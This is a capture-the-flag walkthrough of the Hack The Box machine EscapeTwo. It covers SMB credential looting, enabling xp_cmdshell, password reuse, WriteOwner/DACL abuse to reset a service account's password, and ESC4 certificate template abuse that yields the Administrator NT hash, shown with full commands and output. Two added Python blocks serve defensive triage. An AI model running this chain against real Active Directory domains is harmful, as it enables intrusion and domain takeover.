Description
EscapeTwo is an easy Hack The Box machine that features:
- Initial access using an assumed-breach scenario that leads to the discovery of an SMB share
- The SMB share holds a damaged spreadsheet that reveals DB administrator credentials
- The DB administrator is able to run commands and read a file with credentials
- The user those credentials belong to has WriteOwner permission over the Certification Authority account, so the Certification Authority account's password can be changed
- Privilege escalation via a vulnerability in a certificate template
Footprinting
First, we use the ping command to check whether the machine is up and to guess its operating system. The target machine IP address is 10.129.241.157.
$ ping -c 3 10.129.241.157
PING 10.129.241.157 (10.129.241.157) 56(84) bytes of data.
64 bytes from 10.129.241.157: icmp_seq=1 ttl=127 time=53.8 ms
64 bytes from 10.129.241.157: icmp_seq=2 ttl=127 time=54.2 ms
64 bytes from 10.129.241.157: icmp_seq=3 ttl=127 time=53.2 ms
--- 10.129.241.157 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2004ms
rtt min/avg/max/mdev = 53.226/53.739/54.216/0.405 ms
The machine is active and, with a TTL of 127 (128 minus one hop), we can assume it is a Windows machine. Now we run an Nmap TCP SYN scan to find the open ports.
$ sudo nmap 10.129.241.157 -sS -oN nmap_scan
Starting Nmap 7.94SVN ( https://nmap.org )
Nmap scan report for 10.129.241.157
Host is up (0.054s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
Nmap done: 1 IP address (1 host up) scanned in 5.68 seconds
We get many open ports, all related to an Active Directory Domain Controller.
Enumeration
Then we do a more advanced scan, with service version and scripts.
$ nmap 10.129.241.157 -Pn -sV -sC -p53,88,135,139,389,445,464,593,636,1433,3268,3269 -oN nmap_scan_ports
Starting Nmap 7.94SVN ( https://nmap.org )
Nmap scan report for 10.129.241.157
Host is up (0.058s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.129.241.157:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.241.157:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-09T13:11:12
|_Not valid after: 2055-01-09T13:11:12
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2s, deviation: 0s, median: 2s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.53 seconds
We get the services related to an Active Directory, specifically the Domain Controller DC01.sequel.htb. We add the hosts to our /etc/hosts local file.
$ echo "10.129.241.157 sequel.htb" | sudo tee -a /etc/hosts
$ echo "10.129.241.157 DC01.sequel.htb" | sudo tee -a /etc/hosts
As an assumed breach, we have the credentials of the rose user (password KxEPkKe6R8su), so we start by enumerating the domain users and the SMB shares.
$ netexec smb sequel.htb -u rose -p KxEPkKe6R8su --users --shares
SMB 10.129.241.157 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.241.157 445 DC01 [+] sequel.htb\rose:KxEPkKe6R8su
SMB 10.129.241.157 445 DC01 [*] Enumerated shares
SMB 10.129.241.157 445 DC01 Share Permissions Remark
SMB 10.129.241.157 445 DC01 ----- ----------- ------
SMB 10.129.241.157 445 DC01 Accounting Department READ
SMB 10.129.241.157 445 DC01 ADMIN$ Remote Admin
SMB 10.129.241.157 445 DC01 C$ Default share
SMB 10.129.241.157 445 DC01 IPC$ READ Remote IPC
SMB 10.129.241.157 445 DC01 NETLOGON READ Logon server share
SMB 10.129.241.157 445 DC01 SYSVOL READ Logon server share
SMB 10.129.241.157 445 DC01 Users READ
SMB 10.129.241.157 445 DC01 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.129.241.157 445 DC01 Administrator 2024-06-08 16:32:20 0 Built-in account for administering the computer/domain
SMB 10.129.241.157 445 DC01 Guest 2024-12-25 14:44:53 0 Built-in account for guest access to the computer/domain
SMB 10.129.241.157 445 DC01 krbtgt 2024-06-08 16:40:23 0 Key Distribution Center Service Account
SMB 10.129.241.157 445 DC01 michael 2024-06-08 16:47:37 0
SMB 10.129.241.157 445 DC01 ryan 2024-06-08 16:55:45 0
SMB 10.129.241.157 445 DC01 oscar 2024-06-08 16:56:36 0
SMB 10.129.241.157 445 DC01 sql_svc 2024-06-09 07:58:42 0
SMB 10.129.241.157 445 DC01 rose 2024-12-25 14:44:54 0
SMB 10.129.241.157 445 DC01 ca_svc 2025-01-11 22:07:38 0
SMB 10.129.241.157 445 DC01 [*] Enumerated 9 local users: SEQUEL
We have read access to a share, Accounting Department, and among the listed users are Administrator, ryan, oscar, sql_svc, rose and ca_svc. If we enumerate the share, we find two spreadsheets: accounting_2024.xlsx and accounts.xlsx. We download them.
$ smbclient '\\sequel.htb\Accounting Department' -U 'rose%KxEPkKe6R8su'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jun 9 12:52:21 2024
.. D 0 Sun Jun 9 12:52:21 2024
accounting_2024.xlsx A 10217 Sun Jun 9 12:14:49 2024
accounts.xlsx A 6780 Sun Jun 9 12:52:07 2024
6367231 blocks of size 4096. 849888 blocks available
smb: \> get accounting_2024.xlsx
getting file \accounting_2024.xlsx of size 10217 as accounting_2024.xlsx (34,9 KiloBytes/sec) (average 34,9 KiloBytes/sec)
smb: \> get accounts.xlsx
getting file \accounts.xlsx of size 6780 as accounts.xlsx (23,1 KiloBytes/sec) (average 29,0 KiloBytes/sec)
If we try to open them we find that they are damaged. Since an .xlsx is a .zip file, we extract accounts.xlsx and check its contents.
$ unzip accounts.xlsx -d accounts
Archive: accounts.xlsx
file #1: bad zipfile offset (local header sig): 0
inflating: accounts/xl/workbook.xml
inflating: accounts/xl/theme/theme1.xml
inflating: accounts/xl/styles.xml
inflating: accounts/xl/worksheets/_rels/sheet1.xml.rels
inflating: accounts/xl/worksheets/sheet1.xml
inflating: accounts/xl/sharedStrings.xml
inflating: accounts/_rels/.rels
inflating: accounts/docProps/core.xml
inflating: accounts/docProps/app.xml
inflating: accounts/docProps/custom.xml
inflating: accounts/[Content_Types].xml
In the accounts/xl/sharedStrings.xml file we find user credentials for angela, oscar, kevin and sa users.
$ xmllint --format accounts/xl/sharedStrings.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="25" uniqueCount="24">
<si>
<t xml:space="preserve">First Name</t>
</si>
<si>
<t xml:space="preserve">Last Name</t>
</si>
<si>
<t xml:space="preserve">Email</t>
</si>
<si>
<t xml:space="preserve">Username</t>
</si>
<si>
<t xml:space="preserve">Password</t>
</si>
<si>
<t xml:space="preserve">Angela</t>
</si>
<si>
<t xml:space="preserve">Martin</t>
</si>
<si>
<t xml:space="preserve">angela@sequel.htb</t>
</si>
<si>
<t xml:space="preserve">angela</t>
</si>
<si>
<t xml:space="preserve">0fwz7Q4mSpurIt99</t>
</si>
<si>
<t xml:space="preserve">Oscar</t>
</si>
<si>
<t xml:space="preserve">Martinez</t>
</si>
<si>
<t xml:space="preserve">oscar@sequel.htb</t>
</si>
<si>
<t xml:space="preserve">oscar</t>
</si>
<si>
<t xml:space="preserve">86LxLBMgEWaKUnBG</t>
</si>
<si>
<t xml:space="preserve">Kevin</t>
</si>
<si>
<t xml:space="preserve">Malone</t>
</si>
<si>
<t xml:space="preserve">kevin@sequel.htb</t>
</si>
<si>
<t xml:space="preserve">kevin</t>
</si>
<si>
<t xml:space="preserve">Md9Wlq1E5bZnVDVo</t>
</si>
<si>
<t xml:space="preserve">NULL</t>
</si>
<si>
<t xml:space="preserve">sa@sequel.htb</t>
</si>
<si>
<t xml:space="preserve">sa</t>
</si>
<si>
<t xml:space="preserve">MSSQLP@ssw0rd!</t>
</si>
</sst>
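The recovery above can be done programmatically. The following Python is an added example (not code from the original write-up): it reads the OOXML parts of an .xlsx directly, resolves the sheet cells against the shared-string table, and reports the rows that sit under a Password header, the check a defender would run over file shares to find plaintext credentials. The workbook it parses is constructed in build_sample_xlsx with placeholder values.

```python
# Added example (not from the original write-up): parse an .xlsx by its OOXML
# parts and flag rows under a "Password" header, as a share-scanning check would.
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
CELL_REF = re.compile(r"^([A-Z]+)(\d+)$")


def col_index(letters):
    """Column letters to a 0-based index: A -> 0, Z -> 25, AA -> 26."""
    return sum((ord(c) - 64) * 26 ** i for i, c in enumerate(reversed(letters))) - 1


def shared_strings(zf):
    """Shared-string table in index order; rich-text runs (<r><t>) are joined."""
    root = ET.fromstring(zf.read("xl/sharedStrings.xml"))
    return ["".join(t.text or "" for t in si.iter(f"{{{NS}}}t"))
            for si in root.iter(f"{{{NS}}}si")]


def sheet_rows(zf, part="xl/worksheets/sheet1.xml"):
    """Resolve every <c> cell of the sheet to text and return the rows as lists."""
    sst, grid = shared_strings(zf), {}
    for c in ET.fromstring(zf.read(part)).iter(f"{{{NS}}}c"):
        m, v = CELL_REF.match(c.get("r", "")), c.find(f"{{{NS}}}v")
        if not m or v is None:
            continue
        text = sst[int(v.text)] if c.get("t") == "s" else v.text  # t="s": shared string
        grid.setdefault(int(m.group(2)), {})[col_index(m.group(1))] = text
    width = max((max(r) for r in grid.values()), default=-1) + 1
    return [[grid[i].get(j) for j in range(width)] for i in sorted(grid)]


def credential_rows(xlsx_bytes):
    """Rows carrying a value under a 'Password' header (row 1 is the header).
    Members are read by name from the central directory, so a damaged entry
    elsewhere in the archive (as with accounts.xlsx) does not stop the read."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        rows = sheet_rows(zf)
    header = [(h or "").strip().lower() for h in rows[0]] if rows else []
    if "password" not in header:
        return []
    p = header.index("password")
    u = header.index("username") if "username" in header else None
    return [{"username": r[u] if u is not None else None, "password": r[p]}
            for r in rows[1:] if r[p]]


def build_sample_xlsx():
    """Constructed minimal workbook with the layout of accounts.xlsx; the
    credential values are placeholders, not the machine's."""
    sst = ["Username", "Password", "angela", "PLACEHOLDER-pw-1", "sa", "PLACEHOLDER-pw-2"]
    sst_xml = f'<sst xmlns="{NS}" count="6" uniqueCount="6">' + "".join(
        f'<si><t xml:space="preserve">{s}</t></si>' for s in sst) + "</sst>"

    def row(r, *idx):  # one <row> whose cells reference shared-string indexes
        return f'<row r="{r}">' + "".join(
            f'<c r="{chr(65 + j)}{r}" t="s"><v>{i}</v></c>' for j, i in enumerate(idx)) + "</row>"

    sheet_xml = (f'<worksheet xmlns="{NS}"><sheetData>' + row(1, 0, 1) + row(2, 2, 3)
                 + row(3, 4, 5) + "</sheetData></worksheet>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("xl/sharedStrings.xml", sst_xml)
        zf.writestr("xl/worksheets/sheet1.xml", sheet_xml)
    return buf.getvalue()
```

Running credential_rows(build_sample_xlsx()) returns the two placeholder username/password pairs; pointing it at a real workbook only needs the file's bytes.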
sa is the built-in Microsoft SQL Server administrator and its password is MSSQLP@ssw0rd!. We can connect to the database and try to gain remote command execution using the impacket-mssqlclient tool.
$ impacket-mssqlclient 'sa:MSSQLP@ssw0rd!'@sequel.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (sa dbo@master)> xp_cmdshell whoami
ERROR(DC01\SQLEXPRESS): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
We cannot run commands as the xp_cmdshell component is deactivated.
Exploitation
We are able to activate the xp_cmdshell component with the enable_xp_cmdshell command. We can then run commands as the sequel\sql_svc user.
SQL (sa dbo@master)> enable_xp_cmdshell
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (sa dbo@master)> xp_cmdshell whoami
output
--------------
sequel\sql_svc
NULL
Exploring the file system, we find a file, C:\SQL2019\ExpressAdv_ENU\sql-Configuration.INI, with credentials related to the database installation. The password for the sql_svc user is WqSZAF6CysDQbGb3.
SQL (sa dbo@master)> xp_cmdshell dir C:\
output
----------------------------------------------------------
...
11/05/2022 11:03 AM <DIR> PerfLogs
01/04/2025 07:11 AM <DIR> Program Files
06/09/2024 07:37 AM <DIR> Program Files (x86)
06/08/2024 02:07 PM <DIR> SQL2019
06/09/2024 05:42 AM <DIR> Users
01/04/2025 08:10 AM <DIR> Windows
...
SQL (sa dbo@master)> xp_cmdshell dir C:\SQL2019
output
...
06/08/2024 02:07 PM <DIR> .
06/08/2024 02:07 PM <DIR> ..
01/03/2025 07:29 AM <DIR> ExpressAdv_ENU
...
SQL (sa dbo@master)> xp_cmdshell dir C:\SQL2019\ExpressAdv_ENU
output
---------------------------------------------------------------
...
01/03/2025 07:29 AM <DIR> .
01/03/2025 07:29 AM <DIR> ..
06/08/2024 02:07 PM <DIR> 1033_ENU_LP
09/24/2019 09:03 PM 45 AUTORUN.INF
09/24/2019 09:03 PM 788 MEDIAINFO.XML
06/08/2024 02:07 PM 16 PackageId.dat
06/08/2024 02:07 PM <DIR> redist
06/08/2024 02:07 PM <DIR> resources
09/24/2019 09:03 PM 142,944 SETUP.EXE
09/24/2019 09:03 PM 486 SETUP.EXE.CONFIG
06/08/2024 02:07 PM 717 sql-Configuration.INI
09/24/2019 09:03 PM 249,448 SQLSETUPBOOTSTRAPPER.DLL
06/08/2024 02:07 PM <DIR> x64
...
SQL (sa dbo@master)> xp_cmdshell type C:\SQL2019\ExpressAdv_ENU\sql-Configuration.INI
output
-------------------------------------------------
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False"
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
SECURITYMODE="SQL"
SAPWD="MSSQLP@ssw0rd!"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True
...
Let’s check if the password is reused for another user in the domain.
$ netexec smb sequel.htb -u users -p 'WqSZAF6CysDQbGb3'
SMB 10.129.241.157 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.241.157 445 DC01 [-] sequel.htb\Administrator:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
SMB 10.129.241.157 445 DC01 [+] sequel.htb\ryan:WqSZAF6CysDQbGb3
The password is reused for the ryan user. Let's try to get a remote session using the evil-winrm tool.
$ evil-winrm -i sequel.htb -u 'ryan' -p 'WqSZAF6CysDQbGb3'
Evil-WinRM shell v3.6
...
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami
sequel\ryan
We get a session as the ryan user.
Post-Exploitation
Let's use the PowerView tool to check for weaknesses in the ACLs of the domain.
$ cp /usr/share/windows-resources/powersploit/Recon/PowerView.ps1 .
$ evil-winrm -i sequel.htb -u 'ryan' -p 'WqSZAF6CysDQbGb3'
...
*Evil-WinRM* PS C:\Users\ryan\Documents> upload PowerView.ps1
Info: Uploading PowerView.ps1 to C:\Users\ryan\Documents\PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\ryan\Documents> . .\PowerView.ps1; Find-InterestingDomainAcl -ResolveGUIDs | ? {$_.IdentityReferenceName -eq "ryan"}
ObjectDN : CN=Certification Authority,CN=Users,DC=sequel,DC=htb
AceQualifier : AccessAllowed
ActiveDirectoryRights : WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-548670397-972687484-3496335370-1114
IdentityReferenceName : ryan
IdentityReferenceDomain : sequel.htb
IdentityReferenceDN : CN=Ryan Howard,CN=Users,DC=sequel,DC=htb
IdentityReferenceClass : user
We find that the ryan user has the WriteOwner right over the user object named Certification Authority.
*Evil-WinRM* PS C:\Users\ryan\Documents> . .\PowerView.ps1; Get-DomainUser "CN=Certification Authority,CN=Users,DC=sequel,DC=htb"
logoncount : 0
badpasswordtime : 6/9/2024 10:14:40 AM
distinguishedname : CN=Certification Authority,CN=Users,DC=sequel,DC=htb
objectclass : {top, person, organizationalPerson, user}
displayname : Certification Authority
lastlogontimestamp : 6/9/2024 10:14:42 AM
userprincipalname : ca_svc@sequel.htb
name : Certification Authority
The Certification Authority user has the username ca_svc. With the WriteOwner right we can make ryan the owner of the ca_svc user, grant ryan full control over it and then change its password so we can operate as ca_svc. We rewrite the owner with impacket-owneredit, change the DACL with impacket-dacledit and change the password with rpcclient.
$ impacket-owneredit -action write -new-owner 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Current owner information below
[*] - SID: S-1-5-21-548670397-972687484-3496335370-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=sequel,DC=htb
[*] OwnerSid modified successfully!
$ impacket-dacledit -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit.bak
[*] DACL modified successfully!
$ rpcclient -U 'sequel.htb/ryan%WqSZAF6CysDQbGb3' sequel.htb
rpcclient $> setuserinfo2 ca_svc 23 'new_password'
Now that we have access to the ca_svc user, we search for vulnerabilities in the Active Directory Certificate Services templates with the certipy-ad tool.
$ certipy-ad find -username ca_svc@sequel.htb -password new_password -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'sequel-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : sequel-DC01-CA
DNS Name : DC01.sequel.htb
Certificate Subject : CN=sequel-DC01-CA, DC=sequel, DC=htb
Certificate Serial Number : 152DBD2D8E9C079742C0F3BFF2A211D3
Certificate Validity Start : 2024-06-08 16:50:40+00:00
Certificate Validity End : 2124-06-08 17:00:40+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : SEQUEL.HTB\Administrators
Access Rights
ManageCertificates : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
ManageCa : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Enroll : SEQUEL.HTB\Authenticated Users
Certificate Templates
0
Template Name : DunderMifflinAuthentication
Display Name : Dunder Mifflin Authentication
Certificate Authorities : sequel-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectRequireCommonName
SubjectAltRequireDns
Enrollment Flag : AutoEnrollment
PublishToDs
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1000 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Enterprise Admins
Full Control Principals : SEQUEL.HTB\Cert Publishers
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
Write Property Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
[!] Vulnerabilities
ESC4 : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions
We find a vulnerability (ESC4) in the DunderMifflinAuthentication template of the certification authority sequel-DC01-CA: SEQUEL.HTB\Cert Publishers has dangerous permissions over the template. We can abuse this by modifying the template to introduce other weaknesses and then use them to obtain an authentication certificate for the Administrator user. We start by rewriting the template, saving the old configuration.
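The two findings in this section, ryan's WriteOwner ACE over the ca_svc account and the Cert Publishers rights over the template, are exactly what a defender should look for in the same data. The following Python is an added example, not part of the original write-up, PowerView or Certipy: it parses PowerView's Format-List output, flags control rights held outside the admin groups, and applies the same test to a template record built from the Certipy output above (PRIVILEGED, CONTROL_RIGHTS and the sample records are constructed here).

```python
# Added example (not from the original write-up): triage the ACL data above as a
# defender would: parse PowerView's Format-List output and check a certificate
# template's permissions for the ESC4 condition (control held outside admin groups).
PRIVILEGED = {"Domain Admins", "Enterprise Admins", "Administrators", "Administrator"}
CONTROL_RIGHTS = {"GenericAll", "GenericWrite", "WriteOwner", "WriteDacl", "WriteProperty"}


def short_name(principal):
    """'SEQUEL.HTB\\Cert Publishers' -> 'Cert Publishers'."""
    return principal.rsplit("\\", 1)[-1]


def parse_format_list(text):
    """Split PowerShell Format-List output ('Key : Value' lines) into one dict per block."""
    records, cur = [], {}
    for line in text.splitlines():
        if not line.strip():
            records, cur = records + ([cur] if cur else []), {}
            continue
        key, _, value = line.partition(":")
        cur[key.strip()] = value.strip()
    return records + ([cur] if cur else [])


def triage_aces(records):
    """(principal, object, rights) for each control ACE held by a non-privileged principal."""
    hits = []
    for r in records:
        rights = {x.strip() for x in r.get("ActiveDirectoryRights", "").split(",")}
        who = short_name(r.get("IdentityReferenceName", ""))
        bad = sorted(rights & CONTROL_RIGHTS)
        if bad and who not in PRIVILEGED:
            hits.append((who, r.get("ObjectDN", ""), bad))
    return hits


def triage_template(t):
    """Certipy-style template record -> list of issue strings."""
    name, issues = t["Template Name"], []
    # ESC4: a non-privileged principal can rewrite the template itself
    for field in ("Owner", "Full Control Principals", "Write Owner Principals",
                  "Write Dacl Principals", "Write Property Principals"):
        issues += [f"ESC4: {p} has {field} on {name}"
                   for p in t.get(field, []) if short_name(p) not in PRIVILEGED]
    # the state ESC4 is abused to create: low-privileged enrollees choose the subject
    # (e.g. another user's UPN) of a certificate usable for client authentication
    if (any(short_name(p) not in PRIVILEGED for p in t.get("Enrollment Rights", []))
            and t.get("Enrollee Supplies Subject") and t.get("Client Authentication")
            and not t.get("Requires Manager Approval")):
        issues.append(f"{name}: low-privileged enrollees control the subject of a client-auth certificate")
    return issues


# Constructed from the PowerView and Certipy output above; a benign Domain Admins
# ACE is added for contrast and TEMPLATE_AFTER is a constructed "rewritten" state.
POWERVIEW_SAMPLE = """ObjectDN : CN=Certification Authority,CN=Users,DC=sequel,DC=htb
ActiveDirectoryRights : WriteOwner
IdentityReferenceName : ryan

ObjectDN : CN=Certification Authority,CN=Users,DC=sequel,DC=htb
ActiveDirectoryRights : GenericAll
IdentityReferenceName : Domain Admins
"""
TEMPLATE_BEFORE = {
    "Template Name": "DunderMifflinAuthentication", "Client Authentication": True,
    "Enrollee Supplies Subject": False, "Requires Manager Approval": False,
    "Enrollment Rights": ["SEQUEL.HTB\\Domain Admins", "SEQUEL.HTB\\Enterprise Admins"],
    "Owner": ["SEQUEL.HTB\\Enterprise Admins"],
    "Full Control Principals": ["SEQUEL.HTB\\Cert Publishers"],
    "Write Dacl Principals": ["SEQUEL.HTB\\Domain Admins", "SEQUEL.HTB\\Cert Publishers"],
}
TEMPLATE_AFTER = {**TEMPLATE_BEFORE, "Enrollee Supplies Subject": True,
                  "Enrollment Rights": ["SEQUEL.HTB\\Authenticated Users"]}
```

triage_aces(parse_format_list(POWERVIEW_SAMPLE)) reports only ryan's WriteOwner ACE, and triage_template flags the two Cert Publishers rights on TEMPLATE_BEFORE plus the open-enrollment condition on TEMPLATE_AFTER.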
$ certipy-ad template -u ca_svc -p 'new_password' -template DunderMifflinAuthentication -target DC01.sequel.htb -save-old
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Saved old configuration for 'DunderMifflinAuthentication' to 'DunderMifflinAuthentication.json'
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'
Then we request the domain admin certificate using the new template.
$ certipy-ad req -ca sequel-DC01-CA -u ca_svc -p 'new_password' -template DunderMifflinAuthentication -target DC01.sequel.htb -upn administrator@sequel.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 8
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
And finally we authenticate using the certificate to obtain the NTLM hash, 7a8d4e04986afa8ed4060f75e5a0b3ff.
$ certipy-ad auth -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff
We can log in as Domain Administrator using evil-winrm with the hash.
